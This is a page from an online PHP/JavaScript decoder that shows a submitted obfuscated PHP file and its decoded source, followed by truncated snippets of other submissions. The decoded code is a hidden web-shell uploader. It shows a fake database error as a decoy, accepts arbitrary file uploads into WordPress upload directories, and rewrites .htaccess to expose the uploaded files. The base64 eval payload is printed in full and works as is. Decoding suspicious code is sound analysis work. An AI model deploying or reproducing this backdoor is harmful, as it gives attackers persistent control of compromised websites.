Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
$codeParts = [
    'ZXJyb3JfcmVwb3J0aW5nKDApOwpjaG1vZChiYXNlbmFtZSgkX1NFUlZFUlsiUEhQX1NFTEYiXSks',
    'IDA0NDQpOwplY2hvKCIjREJfY29ubmVjdGlvbl9lcnJvciIpOwppZihpc3NldCgkX0dFVFsidSJd',
    'KSl7CiAgICBlY2hvJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRp',
    'cGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CiAgICBlY2hv',
    'JzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSIzMCI+PGlucHV0IG5hbWU9Il91',
    'cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwogICAg',
    'aWYoJF9QT1NUWydfdXBsJ109PSJVcGxvYWQiKXsKCiAgICAgICAgJGJhc2VEaXIgPSAnL3VwbG9h',
    'ZHMvJyAuIGRhdGUoJ1knKSAuICcvJyAuIGRhdGUoJ20nKSAuICcvJzsKICAgICAgICAkZGlyc1Rv',
    'Q2hlY2sgPSBbCiAgICAgICAgICAgICcvd3AtY29udGVudC91cGxvYWRzLycgLiBkYXRlKCdZJykg',
    'LiAnLycgLiBkYXRlKCdtJyksCiAgICAgICAgICAgICcvd3AtY29udGVudC91cGxvYWRzLycgLiBk',
    'YXRlKCdZJyksCiAgICAgICAgICAgICcvd3AtY29udGVudC91cGxvYWRzJywKICAgICAgICAgICAg',
    'Jy91cGxvYWRzJywKICAgICAgICAgICAgJy9maWxlcycsCiAgICAgICAgICAgICcvdG1wJywKICAg',
    'ICAgICAgICAgJy90ZW1wJwogICAgICAgIF07CiAgICAgICAgCiAgICAgICAgJHRhcmdldERpciA9',
    'IG51bGw7CiAgICAgICAgZm9yZWFjaCAoJGRpcnNUb0NoZWNrIGFzICRkaXIpIHsKICAgICAgICAg',
    'ICAgaWYgKGlzX2RpcigkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gJGRpcikpIHsKICAgICAg',
    'ICAgICAgICAgICR0YXJnZXREaXIgPSAkZGlyIC4gJy8nOwogICAgICAgICAgICAgICAgYnJlYWs7',
    'CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgaWYgKCEkdGFyZ2V0RGly',
    'KSB7CiAgICAgICAgICAgICR0YXJnZXREaXIgPSAkYmFzZURpcjsKICAgICAgICAgICAgbWtkaXIo',
    'JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICRiYXNlRGlyLCAwNzc3LCB0cnVlKTsKICAgICAg',
    'ICB9CiAgICAgICAgCiAgICAgICAgJHJlbGF0aXZlUGF0aCA9ICR0YXJnZXREaXIgLiAkX0ZJTEVT',
    'WydmaWxlJ11bJ25hbWUnXTsKICAgICAgICAKICAgICAgICBpZiAoQGNvcHkoJF9GSUxFU1snZmls',
    'ZSddWyd0bXBfbmFtZSddLCAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gJHJlbGF0aXZlUGF0',
    'aCkpewogICAgICAgIAogICAgICAgICAgICBlY2hvICdTU1MgJy4kX0ZJTEVTWydmaWxlJ11bJ3Rt',
    'cF9uYW1lJ10uJyAnLiRyZWxhdGl2ZVBhdGg7CiAgICAgICAgICAgIGlmKCRfRklMRVNbJ2ZpbGUn',
    'XVsnbmFtZSddICE9ICdhbnRpdmlydXMucGhwJykgewoKICAgICAgICAgICAgICAgICRodGFjY2Vz',
    'c0ZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gJy8uaHRhY2Nlc3MnOyAKICAgICAg',
    'ICAgICAgICAgICRuZXdSdWxlID0gIlJld3JpdGVSdWxlIF5hcnRpY2wvIiAuICRfRklMRVNbJ2Zp',
    'bGUnXVsnbmFtZSddIC4gIiQgIiAuICRyZWxhdGl2ZVBhdGggLiAiIFtMXSI7CiAgICAgICAgICAg',
    'ICAgICAKICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygkaHRhY2Nlc3NGaWxlKSkgewog',
    'ICAgICAgICAgICAgICAgICAgICRodGFjY2Vzc0NvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygk',
    'aHRhY2Nlc3NGaWxlKTsKICAgICAgICAgICAgICAgICAgICBpZiAoc3RycG9zKCRodGFjY2Vzc0Nv',
    'bnRlbnQsICRuZXdSdWxlKSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgICAgICAgICAgZWNo',
    'byAiICsgUnVsYWxleGkiOwogICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAg',
    'ICAgICAgICAgICAgIGlmIChzdHJwb3MoJGh0YWNjZXNzQ29udGVudCwgJzxJZk1vZHVsZSBtb2Rf',
    'cmV3cml0ZS5jPicpID09PSBmYWxzZSkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgJGh0',
    'YWNjZXNzQ29udGVudCA9ICI8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz5cblJld3JpdGVFbmdpbmUg',
    'T25cbiRuZXdSdWxlXG48L0lmTW9kdWxlPlxuXG4iIC4gJGh0YWNjZXNzQ29udGVudDsKICAgICAg',
    'ICAgICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICRw',
    'YXR0ZXJuSWZNb2R1bGUgPSAnLzxJZk1vZHVsZVxzK21vZF9yZXdyaXRlXC5jPiguKik8XC9JZk1v',
    'ZHVsZT4vaXMnOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKHByZWdfbWF0Y2goJHBh',
    'dHRlcm5JZk1vZHVsZSwgJGh0YWNjZXNzQ29udGVudCwgJG1hdGNoZXMpKSB7CiAgICAgICAgICAg',
    'ICAgICAgICAgICAgICAgICAgICAgJGJsb2NrQ29udGVudCA9ICRtYXRjaGVzWzFdOwogICAgICAg',
    'ICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChzdHJwb3MoJGJsb2NrQ29udGVudCwgJ1Jld3Jp',
    'dGVFbmdpbmUgT24nKSA9PT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg',
    'ICAgICAgJGJsb2NrQ29udGVudCA9ICJSZXdyaXRlRW5naW5lIE9uXG4iIC4gJGJsb2NrQ29udGVu',
    'dDsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAg',
    'ICAgICAgICAgICAgJGJsb2NrQ29udGVudCA9IHByZWdfcmVwbGFjZSgnLyhSZXdyaXRlRW5naW5l',
    'IE9uKS9pJywgIiQxXG4kbmV3UnVsZSIsICRibG9ja0NvbnRlbnQsIDEpOwogICAgICAgICAgICAg',
    'ICAgICAgICAgICAgICAgICAgICRuZXdCbG9jayA9ICI8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz5c',
    'biIgLiAkYmxvY2tDb250ZW50IC4gIlxuPC9JZk1vZHVsZT4iOwogICAgICAgICAgICAgICAgICAg',
    'ICAgICAgICAgICAgICRodGFjY2Vzc0NvbnRlbnQgPSBwcmVnX3JlcGxhY2UoJHBhdHRlcm5JZk1v',
    'ZHVsZSwgJG5ld0Jsb2NrLCAkaHRhY2Nlc3NDb250ZW50LCAxKTsKICAgICAgICAgICAgICAgICAg',
    'ICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGh0YWNj',
    'ZXNzQ29udGVudCA9ICI8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz5cblJld3JpdGVFbmdpbmUgT25c',
    'biRuZXdSdWxlXG48L0lmTW9kdWxlPlxuXG4iIC4gJGh0YWNjZXNzQ29udGVudDsKICAgICAgICAg',
    'ICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAg',
    'ICAgICAgICAgICAgICBpZiAoZmlsZV9wdXRfY29udGVudHMoJGh0YWNjZXNzRmlsZSwgJGh0YWNj',
    'ZXNzQ29udGVudCkpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVjaG8gIiArIFN1Y3J1',
    'bCI7CiAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAg',
    'ICAgICAgICBlY2hvICIgKyBGYWxydWwiOwogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAg',
    'ICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAg',
    'ICAgICAkaHRhY2Nlc3NDb250ZW50ID0gIjxJZk1vZHVsZSBtb2RfcmV3cml0ZS5jPlxuUmV3cml0',
    'ZUVuZ2luZSBPblxuJG5ld1J1bGVcbjwvSWZNb2R1bGU+XG4iOwogICAgICAgICAgICAgICAgICAg',
    'IGlmIChmaWxlX3B1dF9jb250ZW50cygkaHRhY2Nlc3NGaWxlLCAkaHRhY2Nlc3NDb250ZW50KSkg',
    'ewogICAgICAgICAgICAgICAgICAgICAgICBlY2hvICIgKyBTdWNydWwiOwogICAgICAgICAgICAg',
    'ICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgIGVjaG8gIiArIEZhbHJ1bCI7',
    'CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAg',
    'ICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgZWNobyAnRkZGICcuJF9GSUxFU1snZmlsZSddWyd0',
    'bXBfbmFtZSddLicgJy4kcmVsYXRpdmVQYXRoOwogICAgICAgIH0KICAgIH07Cn07',
];
$code = implode('', $codeParts);
eval(base64_decode($code));
?>

Decrypted code:

error_reporting(0);
chmod(basename($_SERVER["PHP_SELF"]), 0444);
echo("#DB_connection_error");
if(isset($_GET["u"])){
    echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if($_POST['_upl']=="Upload"){

        $baseDir = '/uploads/' . date('Y') . '/' . date('m') . '/';
        $dirsToCheck = [
            '/wp-content/uploads/' . date('Y') . '/' . date('m'),
            '/wp-content/uploads/' . date('Y'),
            '/wp-content/uploads',
            '/uploads',
            '/files',
            '/tmp',
            '/temp'
        ];
        
        $targetDir = null;
        foreach ($dirsToCheck as $dir) {
            if (is_dir($_SERVER['DOCUMENT_ROOT'] . $dir)) {
                $targetDir = $dir . '/';
                break;
            }
        }
        
        if (!$targetDir) {
            $targetDir = $baseDir;
            mkdir($_SERVER['DOCUMENT_ROOT'] . $baseDir, 0777, true);
        }
        
        $relativePath = $targetDir . $_FILES['file']['name'];
        
        if (@copy($_FILES['file']['tmp_name'], $_SERVER['DOCUMENT_ROOT'] . $relativePath)){
        
            echo 'SSS '.$_FILES['file']['tmp_name'].' '.$relativePath;
            if($_FILES['file']['name'] != 'antivirus.php') {

                $htaccessFile = $_SERVER['DOCUMENT_ROOT'] . '/.htaccess'; 
                $newRule = "RewriteRule ^articl/" . $_FILES['file']['name'] . "$ " . $relativePath . " [L]";
                
                if (file_exists($htaccessFile)) {
                    $htaccessContent = file_get_contents($htaccessFile);
                    if (strpos($htaccessContent, $newRule) !== false) {
                        echo " + Rulalexi";
                    } else {
                        if (strpos($htaccessContent, '<IfModule mod_rewrite.c>') === false) {
                            $htaccessContent = "<IfModule mod_rewrite.c>\nRewriteEngine On\n$newRule\n</IfModule>\n\n" . $htaccessContent;
                        } else {
                            $patternIfModule = '/<IfModule\s+mod_rewrite\.c>(.*)<\/IfModule>/is';
                            if (preg_match($patternIfModule, $htaccessContent, $matches)) {
                                $blockContent = $matches[1];
                                if (strpos($blockContent, 'RewriteEngine On') === false) {
                                    $blockContent = "RewriteEngine On\n" . $blockContent;
                                }
                                $blockContent = preg_replace('/(RewriteEngine On)/i', "$1\n$newRule", $blockContent, 1);
                                $newBlock = "<IfModule mod_rewrite.c>\n" . $blockContent . "\n</IfModule>";
                                $htaccessContent = preg_replace($patternIfModule, $newBlock, $htaccessContent, 1);
                            } else {
                                $htaccessContent = "<IfModule mod_rewrite.c>\nRewriteEngine On\n$newRule\n</IfModule>\n\n" . $htaccessContent;
                            }
                        }
                        if (file_put_contents($htaccessFile, $htaccessContent)) {
                            echo " + Sucrul";
                        } else {
                            echo " + Falrul";
                        }
                    }
                } else {
                    $htaccessContent = "<IfModule mod_rewrite.c>\nRewriteEngine On\n$newRule\n</IfModule>\n";
                    if (file_put_contents($htaccessFile, $htaccessContent)) {
                        echo " + Sucrul";
                    } else {
                        echo " + Falrul";
                    }
                }
            }
        } else {
            echo 'FFF '.$_FILES['file']['tmp_name'].' '.$relativePath;
        }
    };
};

Recent submissions:

eval(gzinflate(base64_decode('FZe3EoTYEUXz/RHtFgEw+JLZwnvvSVR4N3jP12sUEQL9+t17zt//+dffczP/... <?php eval(gzinflate(base64_decode('DZe3DsTWEUV7/YglsGBOsC2BOWcuU2Mwx2XOX+9tiAUr7nsz957zz... <?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(bas... <?php /* Plugin Name: WP Console Plugin URI: https://PixelPioneer.com Description: E... <?php $codeParts = [ 'ZXJyb3JfcmVwb3J0aW5nKDApOwpjaG1vZChiYXNlbmFtZSgkX1NFUlZFUlsiUE... function _0xc4ce(_0x1d6fc1, _0x28bcda) { const _0x53a71f = _0x53a7(); return _0xc4ce =... <?php namespace MiniOrange\TwoFA\Controller\Account; use Magento\Customer\Model\Ac... "{\x22token\x22:\x22c00c81959f50260e40c74412a6e94c02\x22,\x22from\x22:\x222025-01-15 11:21... "{\x0D\x0A\x22to\x22: \x2215.01.2025\x22,\x0D\x0A\x22from\x22: \x2215.01.2025\x22,\x0D\x0A... <?php set_time_limit(0); ini_set("memory_limit", "-1"); $uAZPzuJtiXwFD = [ "usgCqs...